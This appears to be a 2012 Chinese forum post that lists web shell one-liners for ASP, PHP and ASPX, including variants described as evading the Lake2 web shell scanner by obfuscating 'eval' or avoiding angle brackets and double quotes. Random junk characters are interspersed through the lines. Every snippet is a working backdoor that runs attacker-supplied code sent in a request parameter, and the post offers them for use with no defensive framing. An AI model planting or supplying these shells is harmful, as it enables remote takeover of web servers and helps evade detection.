asp一句话 <%execute(request("1"))%> ' o. `$ E6 j+ F, k0 `
* U8 T! Z, s+ t( |) {: Rphp一句话 <?php eval($_POST[1]);?>
2 n# M, V; o$ I; ^3 {/ A8 @# y: o" p' d/ s( ]8 d7 E2 `! N1 _
aspx一句话
' S k0 m9 T" h
5 o: g0 @- c ?% D<script language="C#" runat="server">
, a- W2 s7 s3 s0 W6 ]6 ?6 e4 B1 E, }9 Q* y: h' l
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");1 Q( h; V S4 W- o6 _8 d; T
6 T# A+ ?; `( U: X, [" D
</script>
: j$ ^2 J2 ~' S [1 v4 h2 ?
. x5 t- _. f* W4 n可以躲过雷客图的一句话。
% m: G+ @, L) N6 J7 d" ]) ^" ?' V
$ w* F5 \; G/ i+ G w <%
3 V. l; @; g# D1 j- m% Z+ A& M: x- ?' X0 j" r
set ms = server.CreateObject("MSScriptControl.ScriptControl.1"); E( G) z/ N, C) {/ [+ \) N3 y* H
- |( S( |' ~7 s. S' D6 W; I1 [
ms.Language="VBScript"( x* H4 a% c; n4 i( ?/ r9 W
/ Y: ^4 C4 A; U& T4 X
ms.AddObject "Response", Response
* n! i& q5 J+ E/ Z7 \5 p% q# \: F3 m! U
ms.AddObject "request", request
2 _7 g+ l( [* q$ e6 p2 D3 w' q/ {. \
ms.ExecuteStatement("ev"&"al(request(""1""))")
) {8 ^: R; G' p5 x' a
0 V0 Z$ y/ M6 U3 G4 E* s %>; O' i) M8 R; r
! B) `0 k3 o" a8 d 不用'<,>'的asp一句话
4 I$ G4 @6 a2 k% s6 f7 U2 P& g
7 d. X+ g; z7 ? <script language=VBScript runat=server>execute request("1")</script>
7 L/ f( i4 n: e
& N5 b1 J9 J# h" E% F& c 不用双引号的一句话。
7 X4 A, q: Z5 L2 |
, n7 ?8 Y: v' g0 d: m" g3 p <%eval request(chr(35))%>
- A2 k% X! y) A! C/ Z8 T |
发表于 2012-9-23 14:36:09
收藏
支持
反对